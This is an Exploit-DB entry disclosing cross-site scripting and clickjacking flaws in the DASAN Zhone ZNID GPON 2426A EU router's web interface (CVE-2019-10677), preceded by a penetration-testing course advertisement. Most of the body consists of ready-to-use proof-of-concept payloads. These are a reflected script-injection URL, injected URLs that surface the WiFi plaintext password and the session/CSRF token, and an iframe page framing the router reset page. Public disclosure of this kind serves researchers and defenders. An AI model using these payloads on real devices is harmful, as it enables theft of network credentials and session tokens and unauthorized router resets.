DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting

EDB-ID:

47351




Platform:

Hardware

Date:

2019-09-04


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

# Date: 31.03.2019

# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl

# Vendor Homepage: https://dasanzhone.com

# Version: <= S3.1.285

# Alternate Version: <= S3.0.738

# Tested on: version S3.1.285 (alternate version S3.0.738)

# CVE : CVE-2019-10677


= Reflected Cross-Site Scripting (XSS) =

http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp


= Stored Cross-Site Scripting (XSS) =

* WiFi network plaintext password

http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//

* CSRF token

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//


= Clickjacking =

<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>